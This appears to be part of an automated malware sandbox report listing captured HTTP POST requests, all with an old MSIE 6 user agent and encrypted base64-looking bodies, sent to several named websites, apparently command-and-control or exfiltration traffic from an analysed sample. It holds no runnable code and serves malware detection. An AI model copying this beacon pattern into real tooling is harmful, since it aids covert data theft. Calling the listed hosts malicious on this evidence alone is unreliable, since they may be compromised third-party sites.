              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 63 36 55 61 61 73 79 43 6b 4a 61 46 55 38 35 38 4e 39 2f 4f 4f 39 2f 54 56 34 79 6b 5a 7a 48 5a 77 4e 68 46 56 77 5a 41 47 35 57 6d 55 69 33 68 70 2f 55 4d 4a 66 51 78 6a 6a 79 4c 2b 75 35 66 37 78 67 4a 73 78 6b 5a 66 53 4c 6d 47 73 30 79 54 35 4e 64 42 65 75 4b 4a 44 37 43 57 5a 6d 30 6f 7a 67 32 6d 69 73 73 36 69 45 46 4b 77 56 36 33 77 7a 59 32 31 6d 53 41 71 31 6f 47 49 31 6d 6e 79 58 59 38 30 66 32 48 6c 63 31 2b 50 4c 79 4e 77 4c 58 4a 65 77 6c 62 37 63 70 52 4e 70 53 70 76 77 76 6d 59 54 49 55 64 44 54 45 44 63 62 72 63 78 62 33 45 43 78 36 61 2b 50 67 57 46 77 33 43 70 57 48 62 44 37 31 35 37 39 30 41 31 46 5a 63 52 77 38 72 4e 6b 4a 52 7a 66 5a 6d 77 55 58 32 59 61 53 59 2f 64 76 6a 4e 51 75 43 53 6e 6b 76 61 74 69 63 2b 36 58 67 39 4d 62 39 78 51 5a 63 69 39 6e 37 70 73 4a 51 72 69 71 75 59 64 44 36 35 41 74 39 67 55 63 61 45 2b 39 6d 53 35 66 68 66 35 58 69 76 2b 34 41 6b 4e 4f 43 37 74 64 35 69 69 67 78 7a 79 46 74 6b 6e 58 39 58 53 66 55 46 4b 65 4e 7a 6f 55 6c 62 6a 66 58 45 49 61 37 37 6c 42 45 47 36 6b 38 56 71 4a 2f 53 4b 4d 66 62 6c 56 34 55 6f 68 32 34 6d 46 38 46 47 52 2f 58 79 7a 4b 31 78 32 6b 72 32 67 49 4d 33 30 4c 6f 44 6e 44 52 55 45 71 62 73 56 7a 6f 75 50 6a 38 7a 36 48 4c 68 50 65 45 64 51 32 6a 30 55 58 63 6b 4d 46 6b 45 4c 37 75 62 64 70 74 6e 4b 51 68 52 51 30 31 62 43 67 39 43 72 39 79 6d 67 38 55 54 73 75 4a 36 69 49 63 2b 43 66 47 44 64 38 30 6e 46 61 44 77 77 61 55 38 6f 68 6f 74 57 63 46 6c 59 6a 79 74 69 7a 33 48 67 70 30 36 5a 78 51 4c 59 41 42 73 79 35 30 59 63 47 61 66 55 77 7a 2b 4e 4f 53 69 75 77 7a 6a 30 55 71 72 6c 73 6b 48 66 79 55 6f 6f 42 58 62 63 46 6e 31 32 70 67 55 55 57 49 70 Data Ascii: c6UaasyCkJaFU858N9/OO9/TV4ykZzHZwNhFVwZAG5WmUi3hp/UMJfQxjjyL+u5f7xgJsxkZfSLmGs0yT5NdBeuKJD7CWZm0ozg2miss6iEFKwV63wzY21mSAq1oGI1mnyXY80f2Hlc1+PLyNwLXJewlb7cpRNpSpvwvmYTIUdDTEDcbrcxb3ECx6a+PgWFw3CpWHbD715790A1FZcRw8rNkJRzfZmwUX2YaSY/dvjNQuCSnkvatic+6Xg9Mb9xQZci9n7psJQriquYdD65At9gUcaE+9mS5fhf5Xiv+4AkNOC7td5iigxzyFtknX9XSfUFKeNzoUlbjfXEIa77lBEG6k8VqJ/SKMfblV4Uoh24mF8FGR/XyzK1x2kr2gIM30LoDnDRUEqbsVzouPj8z6HLhPeEdQ2j0UXckMFkEL7ubdptnKQhRQ01bCg9Cr9ymg8UTsuJ6iIc+CfGDd80nFaDwwaU8ohotWcFlYjytiz3Hgp06ZxQLYABsy50YcGafUwz+NOSiuwzj0UqrlskHfyUooBXbcFn12pgUUWIp
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 46 54 47 53 37 44 52 76 6a 4a 62 4f 65 73 79 7a 6a 31 48 7a 73 59 64 41 58 43 45 73 30 4c 55 76 71 4a 39 77 44 4b 54 6d 66 39 4f 76 31 71 4b 2f 62 45 36 74 58 63 70 65 71 43 2b 4f 6c 79 4f 52 47 76 47 4f 44 6a 33 71 6d 52 39 6f 57 51 76 38 45 49 67 36 68 32 58 51 49 51 6e 4d 4e 6b 65 53 66 73 61 57 64 6d 2f 6c 46 4f 36 6b 6f 6b 31 4b 41 50 54 68 2f 43 6e 67 6e 6b 59 36 65 78 2b 7a 45 47 71 79 4f 7a 36 70 47 31 33 69 66 72 30 74 70 4f 42 4a 33 42 54 6d 4e 56 4f 41 68 61 62 58 44 72 6a 30 62 49 61 70 67 37 46 45 75 5a 50 53 42 30 52 54 61 4a 32 49 79 6b 45 73 6a 54 47 62 42 72 41 2f 2f 59 51 42 73 2b 33 6a 45 77 4f 43 76 4d 57 77 58 69 54 42 68 59 53 59 75 45 52 73 61 7a 50 4d 64 4a 30 6d 58 46 72 38 73 66 4f 33 4b 53 41 71 47 56 56 69 49 4d 61 63 45 50 2b 55 48 30 59 6b 6f 6a 61 75 5a 74 47 59 67 6e 7a 4d 72 41 59 6c 57 74 42 68 4d 73 76 6f 6e 75 58 2f 45 46 67 6f 4a 4e 53 49 75 74 58 71 4f 57 6e 7a 4a 7a 66 36 33 4b 64 38 48 78 34 32 71 7a 75 77 36 73 4b 2f 43 59 61 5a 4f 37 70 71 73 44 6f 71 75 78 4f 46 37 6b 69 6d 69 73 33 31 64 30 4a 2b 35 49 51 70 76 78 2b 6a 4b 50 75 7a 55 44 68 71 68 38 32 6c 4d 50 32 48 77 50 6d 58 4a 6a 51 38 4e 73 47 48 54 59 73 62 64 2f 39 30 73 51 6d 39 56 7a 55 4e 74 49 2f 43 4f 31 53 49 4a 55 64 53 44 56 76 42 55 4e 2b 74 4a 54 6d 4a 58 46 58 2f 46 39 69 41 52 63 4a 55 49 70 79 5a 4b 6e 62 38 59 2f 4c 77 79 56 48 46 59 33 6f 5a 79 4d 73 67 30 4d 46 68 61 64 53 65 70 42 34 67 48 50 37 48 59 33 74 6f 34 31 70 6d 2f 6a 45 4f 59 38 47 46 6f 6d 50 55 2f 61 2f 6a 79 39 64 63 32 76 68 34 37 31 2f 48 47 70 72 46 58 62 75 57 70 46 78 4b 79 6f 51 58 72 58 45 55 5a 66 33 53 70 49 75 4a 66 44 61 46 76 6b 36 4b 30 71 7a 37 48 51 3d 3d Data Ascii: FTGS7DRvjJbOesyzj1HzsYdAXCEs0LUvqJ9wDKTmf9Ov1qK/bE6tXcpeqC+OlyORGvGODj3qmR9oWQv8EIg6h2XQIQnMNkeSfsaWdm/lFO6kok1KAPTh/CngnkY6ex+zEGqyOz6pG13ifr0tpOBJ3BTmNVOAhabXDrj0bIapg7FEuZPSB0RTaJ2IykEsjTGbBrA//YQBs+3jEwOCvMWwXiTBhYSYuERsazPMdJ0mXFr8sfO3KSAqGVViIMacEP+UH0YkojauZtGYgnzMrAYlWtBhMsvonuX/EFgoJNSIutXqOWnzJzf63Kd8Hx42qzuw6sK/CYaZO7pqsDoquxOF7kimis31d0J+5IQpvx+jKPuzUDhqh82lMP2HwPmXJjQ8NsGHTYsbd/90sQm9VzUNtI/CO1SIJUdSDVvBUN+tJTmJXFX/F9iARcJUIpyZKnb8Y/LwyVHFY3oZyMsg0MFhadSepB4gHP7HY3to41pm/jEOY8GFomPU/a/jy9dc2vh471/HGprFXbuWpFxKyoQXrXEUZf3SpIuJfDaFvk6K0qz7HQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 41 68 6c 53 61 70 65 45 6b 4a 61 65 55 4a 47 4e 68 74 6c 59 61 65 44 32 5a 53 37 4e 59 43 63 68 75 77 6e 58 56 4e 78 66 4e 5a 62 31 7a 34 58 46 39 6f 37 38 4e 77 33 56 33 38 69 56 62 73 6c 52 56 43 6c 45 55 50 53 75 32 34 5a 37 77 41 65 75 2f 38 45 41 47 2b 6f 56 4a 41 4f 2b 49 73 45 68 68 6b 6e 41 49 31 55 56 73 6a 64 39 6c 4a 63 33 59 6f 33 46 4b 37 49 5a 46 75 59 55 4b 4f 41 54 59 58 68 6d 41 79 78 7a 77 73 54 48 2b 65 48 54 4e 4d 31 78 58 31 55 58 77 50 4e 64 59 62 74 6d 59 6f 5a 61 59 70 53 4b 32 69 45 33 53 53 55 6e 49 4d 70 56 70 58 47 2b 66 51 74 4f 45 67 59 59 56 66 4f 62 53 4e 53 2b 34 42 4f 57 38 48 36 31 4d 43 38 67 35 54 69 34 73 53 53 74 67 4a 65 6a 50 59 38 32 59 39 72 35 4f 65 52 31 32 67 58 46 6c 45 42 4e 36 69 37 56 55 72 36 68 4c 69 4e 6b 38 4f 57 37 34 65 65 2f 69 34 50 71 42 57 77 48 78 5a 6e 4d 64 45 4e 50 4e 77 33 36 53 7a 52 55 49 55 31 4f 65 55 42 43 77 46 32 6e 39 6f 6d 64 48 37 56 2b 38 45 61 2f 2b 34 35 68 4e 79 37 79 41 4b 53 31 62 74 4d 41 68 31 76 59 41 35 62 39 58 7a 69 46 4e 6d 6d 69 44 46 38 63 63 55 5a 34 4c 44 59 66 6f 50 6c 32 52 33 6e 54 69 34 6e 30 39 6d 33 4e 68 69 46 78 45 6b 6c 41 31 6f 6d 68 65 78 36 6a 45 34 73 71 52 42 65 4d 37 4c 73 4a 78 38 67 62 43 41 68 43 74 32 75 39 4f 32 74 63 53 43 44 54 2b 33 34 31 2b 4a 79 7a 63 76 64 51 77 30 38 61 35 33 6e 38 61 45 48 6a 55 4e 44 30 31 41 6e 38 5a 59 4f 73 30 71 6f 65 38 70 30 57 35 4a 6e 45 36 4f 69 31 33 4e 34 76 57 4b 2f 52 35 73 54 71 2b 48 61 52 49 72 74 4a 76 42 63 41 51 61 7a 2f 6d 33 76 51 67 53 55 6d 63 38 67 69 2b 61 58 57 32 78 77 57 43 69 75 61 6f 4e 54 42 66 64 75 57 71 6f 6e 75 46 7a 36 36 6f 68 41 4a 34 58 38 4d 71 77 6f 4e 41 50 74 37 55 74 38 69 Data Ascii: AhlSapeEkJaeUJGNhtlYaeD2ZS7NYCchuwnXVNxfNZb1z4XF9o78Nw3V38iVbslRVClEUPSu24Z7wAeu/8EAG+oVJAO+IsEhhknAI1UVsjd9lJc3Yo3FK7IZFuYUKOATYXhmAyxzwsTH+eHTNM1xX1UXwPNdYbtmYoZaYpSK2iE3SSUnIMpVpXG+fQtOEgYYVfObSNS+4BOW8H61MC8g5Ti4sSStgJejPY82Y9r5OeR12gXFlEBN6i7VUr6hLiNk8OW74ee/i4PqBWwHxZnMdENPNw36SzRUIU1OeUBCwF2n9omdH7V+8Ea/+45hNy7yAKS1btMAh1vYA5b9XziFNmmiDF8ccUZ4LDYfoPl2R3nTi4n09m3NhiFxEklA1omhex6jE4sqRBeM7LsJx8gbCAhCt2u9O2tcSCDT+341+JyzcvdQw08a53n8aEHjUND01An8ZYOs0qoe8p0W5JnE6Oi13N4vWK/R5sTq+HaRIrtJvBcAQaz/m3vQgSUmc8gi+aXW2xwWCiuaoNTBfduWqonuFz66ohAJ4X8MqwoNAPt7Ut8i
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 79 73 44 7a 68 2b 39 36 6b 5a 62 4e 75 46 5a 62 44 6d 73 6b 32 76 67 32 30 46 49 46 73 6d 32 53 6b 7a 6c 45 75 79 44 4c 75 2f 38 4b 70 71 45 4d 5a 65 5a 4a 6e 59 33 76 62 76 50 44 55 44 4f 43 57 62 61 73 75 52 73 31 39 55 4a 38 64 46 35 52 69 58 64 51 30 69 6e 78 44 76 39 39 79 43 4c 49 32 79 62 31 58 68 53 71 45 73 76 50 67 6f 65 42 34 49 67 33 35 45 41 36 69 63 57 5a 74 6b 57 34 6a 44 55 67 37 55 32 67 32 55 6c 32 72 34 37 4c 6d 67 68 63 4d 31 4d 75 4a 71 35 64 79 70 33 74 63 74 69 70 39 6b 55 65 32 76 6b 72 67 4d 64 61 72 57 74 50 31 39 6f 64 49 34 74 71 58 63 49 30 77 6c 31 64 43 55 38 6a 4b 6e 61 66 6a 58 74 62 58 65 34 77 30 78 33 47 65 4e 57 6b 74 42 47 4d 36 39 43 4d 33 38 42 37 70 2f 4f 70 62 43 4b 2f 35 73 56 46 79 55 71 68 6d 73 67 75 61 4e 6d 6f 78 50 6f 78 35 41 47 51 56 6d 70 39 35 6f 5a 50 6c 6d 4b 42 55 62 6d 2b 4e 4d 39 4c 49 33 64 36 64 68 42 63 4a 79 4a 69 56 70 45 4e 59 75 37 55 6e 72 76 32 36 62 46 58 35 44 61 56 71 6a 71 79 34 52 70 59 62 65 58 42 5a 32 63 51 4d 32 6b 6b 6e 5a 30 43 33 39 43 67 70 53 50 75 73 6b 48 30 6b 55 6f 57 43 64 53 69 6a 4b 6e 49 63 6a 50 68 78 6c 55 37 74 32 37 62 38 6f 57 59 75 47 4c 6c 69 68 49 64 4b 2b 35 38 61 63 35 44 37 4f 6c 79 33 6b 66 6a 4c 44 51 47 62 2f 43 69 74 4f 53 70 42 78 52 63 32 42 30 64 44 71 47 46 54 61 4a 74 4c 52 73 39 30 6e 6a 47 35 43 4d 49 77 52 57 35 45 4b 47 74 37 78 78 31 67 36 55 48 31 65 41 4d 51 76 52 6d 4e 67 48 66 41 33 4b 6e 30 46 49 4c 44 33 6d 6e 59 6a 5a 4f 31 6a 41 76 34 36 43 57 6b 33 74 6b 67 71 48 49 37 67 50 71 67 4a 30 64 34 41 34 75 75 6b 53 48 38 74 37 62 4c 6b 68 55 58 32 4c 4f 46 71 65 39 51 33 68 32 38 48 4f 6a 41 61 42 2f 73 62 32 49 50 37 47 63 2b 41 3d 3d Data Ascii: ysDzh+96kZbNuFZbDmsk2vg20FIFsm2SkzlEuyDLu/8KpqEMZeZJnY3vbvPDUDOCWbasuRs19UJ8dF5RiXdQ0inxDv99yCLI2yb1XhSqEsvPgoeB4Ig35EA6icWZtkW4jDUg7U2g2Ul2r47LmghcM1MuJq5dyp3tctip9kUe2vkrgMdarWtP19odI4tqXcI0wl1dCU8jKnafjXtbXe4w0x3GeNWktBGM69CM38B7p/OpbCK/5sVFyUqhmsguaNmoxPox5AGQVmp95oZPlmKBUbm+NM9LI3d6dhBcJyJiVpENYu7Unrv26bFX5DaVqjqy4RpYbeXBZ2cQM2kknZ0C39CgpSPuskH0kUoWCdSijKnIcjPhxlU7t27b8oWYuGLlihIdK+58ac5D7Oly3kfjLDQGb/CitOSpBxRc2B0dDqGFTaJtLRs90njG5CMIwRW5EKGt7xx1g6UH1eAMQvRmNgHfA3Kn0FILD3mnYjZO1jAv46CWk3tkgqHI7gPqgJ0d4A4uukSH8t7bLkhUX2LOFqe9Q3h28HOjAaB/sb2IP7Gc+A==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 73 6d 5a 37 69 65 54 58 6d 5a 61 43 2f 6a 46 52 66 38 47 48 51 37 65 63 56 62 4b 63 37 73 72 6e 57 50 4f 76 32 4f 6d 4c 69 6e 7a 42 2f 41 62 43 34 4e 34 39 4d 76 52 62 68 52 48 46 61 32 73 53 36 6f 53 50 71 36 71 63 51 4d 66 44 45 67 72 4c 73 5a 64 61 31 35 68 53 71 63 66 79 6e 75 4a 36 49 6c 4b 74 74 47 42 71 4b 6f 62 6a 70 57 48 67 7a 4c 47 58 2f 31 30 52 49 69 69 41 46 41 63 71 6c 62 37 4f 7a 41 4c 4a 46 71 78 67 63 63 52 39 31 54 44 52 33 6f 53 49 46 6e 6d 58 70 33 48 51 30 48 53 2f 56 44 57 56 6f 75 38 75 51 54 52 75 43 6d 79 73 6c 2b 52 79 37 63 6d 67 72 4f 70 39 2b 45 77 43 52 6a 43 39 34 77 49 5a 75 66 45 61 6f 55 5a 4f 6f 6b 75 49 78 70 37 36 68 2b 49 46 67 48 35 56 6c 4c 65 2b 6d 41 59 52 37 36 39 70 30 4b 70 72 45 6a 57 51 6e 79 49 6f 65 37 48 47 56 47 76 6f 37 74 54 69 6e 35 6d 30 36 50 79 38 35 58 75 55 46 59 6c 66 42 2f 2b 50 78 79 47 4d 56 59 4f 37 59 36 53 61 52 31 6b 61 30 6a 54 30 58 37 4d 63 53 6c 47 4e 69 7a 58 57 63 54 6b 46 6e 6c 64 6c 63 6e 7a 79 68 7a 61 41 59 48 64 33 53 64 50 45 45 76 43 4c 6d 55 4d 55 33 6b 7a 4f 36 30 50 70 51 48 39 6d 69 65 59 32 30 62 4d 38 76 6c 52 56 2b 31 35 67 4a 48 36 6c 59 2f 65 5a 69 49 58 76 50 6f 61 35 31 48 36 59 57 69 64 2f 39 6c 79 66 77 6b 48 63 57 70 65 2b 70 58 2b 58 51 32 79 53 58 4d 45 4c 55 69 72 66 4a 6f 4f 48 56 30 54 65 6e 32 63 68 35 4a 74 48 57 55 72 5a 56 67 77 6c 77 71 57 2f 59 73 53 44 35 71 75 70 4f 36 30 54 41 2b 66 78 34 73 31 6f 2b 75 34 71 32 30 61 63 6d 42 4f 50 38 58 53 6e 79 5a 45 33 77 63 78 73 37 65 34 48 31 42 62 4b 50 4f 53 59 70 49 50 61 64 58 6a 6c 4c 55 47 4b 50 37 71 71 4c 34 51 4e 70 41 3d 3d Data Ascii: smZ7ieTXmZaC/jFRf8GHQ7ecVbKc7srnWPOv2OmLinzB/AbC4N49MvRbhRHFa2sS6oSPq6qcQMfDEgrLsZda15hSqcfynuJ6IlKttGBqKobjpWHgzLGX/10RIiiAFAcqlb7OzALJFqxgccR91TDR3oSIFnmXp3HQ0HS/VDWVou8uQTRuCmysl+Ry7cmgrOp9+EwCRjC94wIZufEaoUZOokuIxp76h+IFgH5VlLe+mAYR769p0KprEjWQnyIoe7HGVGvo7tTin5m06Py85XuUFYlfB/+PxyGMVYO7Y6SaR1ka0jT0X7McSlGNizXWcTkFnldlcnzyhzaAYHd3SdPEEvCLmUMU3kzO60PpQH9mieY20bM8vlRV+15gJH6lY/eZiIXvPoa51H6YWid/9lyfwkHcWpe+pX+XQ2ySXMELUirfJoOHV0Ten2ch5JtHWUrZVgwlwqW/YsSD5qupO60TA+fx4s1o+u4q20acmBOP8XSnyZE3wcxs7e4H1BbKPOSYpIPadXjlLUGKP7qqL4QNpA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 67 38 34 59 6f 54 69 63 6d 70 62 67 6a 4f 7a 72 75 7a 4c 2f 76 53 74 6f 78 58 65 41 65 39 78 58 37 50 4c 36 53 63 54 6f 46 54 7a 2f 30 45 6a 52 41 4e 33 4f 33 78 64 7a 56 53 47 79 54 30 39 50 32 53 50 44 67 51 39 47 6c 71 78 75 75 38 75 4a 33 79 75 43 35 77 49 64 6e 34 43 2b 56 41 61 2b 58 46 35 79 38 56 71 6e 52 57 65 66 6f 45 74 74 72 7a 4e 61 4c 42 50 62 30 69 52 70 6e 47 55 69 68 46 6c 37 43 37 4c 6f 4e 33 44 57 4b 57 42 36 2b 44 46 45 65 77 68 78 56 50 64 57 64 4b 4b 4c 32 6c 6c 72 72 77 46 79 45 52 71 59 71 63 66 50 48 44 37 42 52 42 74 52 74 4a 45 46 65 36 67 34 39 59 7a 6e 69 49 79 54 75 67 56 73 37 54 32 4a 37 4f 71 36 57 6f 41 39 69 76 4d 78 70 31 6b 2b 69 4b 54 71 6c 6f 41 5a 51 63 72 44 49 49 43 4e 7a 30 4f 30 45 67 41 39 6f 78 74 47 34 68 65 6e 4f 33 6e 2b 50 77 32 4d 77 39 35 44 39 58 71 6a 5a 2f 56 41 2b 70 6c 57 4a 74 4e 67 6d 71 6d 47 79 74 38 76 70 4a 79 47 38 5a 77 50 6e 51 70 51 6a 6c 47 56 42 6c 34 4e 31 74 59 4c 67 69 79 41 73 4f 48 43 70 65 6b 53 42 50 68 64 37 54 63 54 74 6d 67 66 61 65 72 31 67 46 62 2f 5a 47 4c 35 41 73 4c 72 47 4f 69 74 4b 36 32 77 32 6a 62 34 78 74 6f 4c 41 79 72 61 4c 4f 33 69 6c 43 43 49 50 38 34 55 4c 43 6a 78 74 6d 6e 6a 55 54 69 49 50 56 62 36 58 6f 6e 4e 70 76 4b 68 67 38 73 57 6d 4d 34 6e 66 72 77 55 73 50 75 42 50 58 31 30 52 79 63 58 2b 6d 67 41 73 69 76 56 4b 31 36 50 39 79 73 74 62 6f 46 4c 6e 74 4d 76 74 58 63 59 79 64 6c 6a 71 53 4f 30 4f 68 79 47 63 54 42 2f 66 58 35 79 42 48 59 38 39 55 44 74 45 6a 38 4e 72 74 65 6d 32 4c 6d 4f 39 6f 52 49 6c 4d 49 61 51 4c 47 6e 38 62 6e 73 34 59 5a 4c 76 66 77 6d 50 4f 71 57 Data Ascii: g84YoTicmpbgjOzruzL/vStoxXeAe9xX7PL6ScToFTz/0EjRAN3O3xdzVSGyT09P2SPDgQ9Glqxuu8uJ3yuC5wIdn4C+VAa+XF5y8VqnRWefoEttrzNaLBPb0iRpnGUihFl7C7LoN3DWKWB6+DFEewhxVPdWdKKL2llrrwFyERqYqcfPHD7BRBtRtJEFe6g49YzniIyTugVs7T2J7Oq6WoA9ivMxp1k+iKTqloAZQcrDIICNz0O0EgA9oxtG4henO3n+Pw2Mw95D9XqjZ/VA+plWJtNgmqmGyt8vpJyG8ZwPnQpQjlGVBl4N1tYLgiyAsOHCpekSBPhd7TcTtmgfaer1gFb/ZGL5AsLrGOitK62w2jb4xtoLAyraLO3ilCCIP84ULCjxtmnjUTiIPVb6XonNpvKhg8sWmM4nfrwUsPuBPX10RycX+mgAsivVK16P9ystboFLntMvtXcYydljqSO0OhyGcTB/fX5yBHY89UDtEj8Nrtem2LmO9oRIlMIaQLGn8bns4YZLvfwmPOqW
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 46 54 47 53 37 44 52 76 6a 4a 62 4f 65 73 79 7a 6a 31 48 7a 73 59 64 41 58 43 45 73 30 4c 55 76 71 4a 39 77 44 4b 54 6d 66 39 4f 76 31 71 4b 2f 62 45 36 74 58 63 70 65 71 43 2b 4f 6c 79 4f 52 47 76 47 4f 44 6a 33 71 6d 52 39 6f 57 51 76 38 45 49 67 36 68 32 58 51 49 51 6e 4d 4e 6b 65 53 66 73 61 57 64 6d 2f 6c 46 4f 36 6b 6f 6b 31 4b 41 50 54 68 2f 43 6e 67 6e 6b 59 36 65 78 2b 7a 45 47 71 79 4f 7a 36 70 47 31 33 69 66 72 30 74 70 4f 42 4a 33 42 54 6d 4e 56 4f 41 68 61 62 58 44 72 6a 30 62 49 61 70 67 37 46 45 75 5a 50 53 42 30 52 54 61 4a 32 49 79 6b 45 73 6a 54 47 62 42 72 41 2f 2f 59 51 42 73 2b 33 6a 45 77 4f 43 76 4d 57 77 58 69 54 42 68 59 53 59 75 45 52 73 61 7a 50 4d 64 4a 30 6d 58 46 72 38 73 66 4f 33 4b 53 41 71 47 56 56 69 49 4d 61 63 45 50 2b 55 48 30 59 6b 6f 6a 61 75 5a 74 47 59 67 6e 7a 4d 72 41 59 6c 57 74 42 68 4d 73 76 6f 6e 75 58 2f 45 46 67 6f 4a 4e 53 49 75 74 58 71 4f 57 6e 7a 4a 7a 66 36 33 4b 64 38 48 78 34 32 71 7a 75 77 36 73 4b 2f 43 59 61 5a 4f 37 70 71 73 44 6f 71 75 78 4f 46 37 6b 69 6d 69 73 33 31 64 30 4a 2b 35 49 51 70 76 78 2b 6a 4b 50 75 7a 55 44 68 71 68 38 32 6c 4d 50 32 48 77 50 6d 58 4a 6a 51 38 4e 73 47 48 54 59 73 62 64 2f 39 30 73 51 6d 39 56 7a 55 4e 74 49 2f 43 4f 31 53 49 4a 55 64 53 44 56 76 42 55 4e 2b 74 4a 54 6d 4a 58 46 58 2f 46 39 69 41 52 63 4a 55 49 70 79 5a 4b 6e 62 38 59 2f 4c 77 79 56 48 46 59 33 6f 5a 79 4d 73 67 30 4d 46 68 61 64 53 65 70 42 34 67 48 50 37 48 59 33 74 6f 34 31 70 6d 2f 6a 45 4f 59 38 47 46 6f 6d 50 55 2f 61 2f 6a 79 39 64 63 32 76 68 34 37 31 2f 48 47 70 72 46 58 62 75 57 70 46 78 4b 79 6f 51 58 72 58 45 55 5a 66 33 53 70 49 75 4a 66 44 61 46 76 6b 36 4b 30 71 7a 37 48 51 3d 3d Data Ascii: FTGS7DRvjJbOesyzj1HzsYdAXCEs0LUvqJ9wDKTmf9Ov1qK/bE6tXcpeqC+OlyORGvGODj3qmR9oWQv8EIg6h2XQIQnMNkeSfsaWdm/lFO6kok1KAPTh/CngnkY6ex+zEGqyOz6pG13ifr0tpOBJ3BTmNVOAhabXDrj0bIapg7FEuZPSB0RTaJ2IykEsjTGbBrA//YQBs+3jEwOCvMWwXiTBhYSYuERsazPMdJ0mXFr8sfO3KSAqGVViIMacEP+UH0YkojauZtGYgnzMrAYlWtBhMsvonuX/EFgoJNSIutXqOWnzJzf63Kd8Hx42qzuw6sK/CYaZO7pqsDoquxOF7kimis31d0J+5IQpvx+jKPuzUDhqh82lMP2HwPmXJjQ8NsGHTYsbd/90sQm9VzUNtI/CO1SIJUdSDVvBUN+tJTmJXFX/F9iARcJUIpyZKnb8Y/LwyVHFY3oZyMsg0MFhadSepB4gHP7HY3to41pm/jEOY8GFomPU/a/jy9dc2vh471/HGprFXbuWpFxKyoQXrXEUZf3SpIuJfDaFvk6K0qz7HQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 73 6d 5a 37 69 65 54 58 6d 5a 61 43 2f 6a 46 52 66 38 47 48 51 37 65 63 56 62 4b 63 37 73 72 6e 57 50 4f 76 32 4f 6d 4c 69 6e 7a 42 2f 41 62 43 34 4e 34 39 4d 76 52 62 68 52 48 46 61 32 73 53 36 6f 53 50 71 36 71 63 51 4d 66 44 45 67 72 4c 73 5a 64 61 31 35 68 53 71 63 66 79 6e 75 4a 36 49 6c 4b 74 74 47 42 71 4b 6f 62 6a 70 57 48 67 7a 4c 47 58 2f 31 30 52 49 69 69 41 46 41 63 71 6c 62 37 4f 7a 41 4c 4a 46 71 78 67 63 63 52 39 31 54 44 52 33 6f 53 49 46 6e 6d 58 70 33 48 51 30 48 53 2f 56 44 57 56 6f 75 38 75 51 54 52 75 43 6d 79 73 6c 2b 52 79 37 63 6d 67 72 4f 70 39 2b 45 77 43 52 6a 43 39 34 77 49 5a 75 66 45 61 6f 55 5a 4f 6f 6b 75 49 78 70 37 36 68 2b 49 46 67 48 35 56 6c 4c 65 2b 6d 41 59 52 37 36 39 70 30 4b 70 72 45 6a 57 51 6e 79 49 6f 65 37 48 47 56 47 76 6f 37 74 54 69 6e 35 6d 30 36 50 79 38 35 58 75 55 46 59 6c 66 42 2f 2b 50 78 79 47 4d 56 59 4f 37 59 36 53 61 52 31 6b 61 30 6a 54 30 58 37 4d 63 53 6c 47 4e 69 7a 58 57 63 54 6b 46 6e 6c 64 6c 63 6e 7a 79 68 7a 61 41 59 48 64 33 53 64 50 45 45 76 43 4c 6d 55 4d 55 33 6b 7a 4f 36 30 50 70 51 48 39 6d 69 65 59 32 30 62 4d 38 76 6c 52 56 2b 31 35 67 4a 48 36 6c 59 2f 65 5a 69 49 58 76 50 6f 61 35 31 48 36 59 57 69 64 2f 39 6c 79 66 77 6b 48 63 57 70 65 2b 70 58 2b 58 51 32 79 53 58 4d 45 4c 55 69 72 66 4a 6f 4f 48 56 30 54 65 6e 32 63 68 35 4a 74 48 57 55 72 5a 56 67 77 6c 77 71 57 2f 59 73 53 44 35 71 75 70 4f 36 30 54 41 2b 66 78 34 73 31 6f 2b 75 34 71 32 30 61 63 6d 42 4f 50 38 58 53 6e 79 5a 45 33 77 63 78 73 37 65 34 48 31 42 62 4b 50 4f 53 59 70 49 50 61 64 58 6a 6c 4c 55 47 4b 50 37 71 71 4c 34 51 4e 70 41 3d 3d Data Ascii: 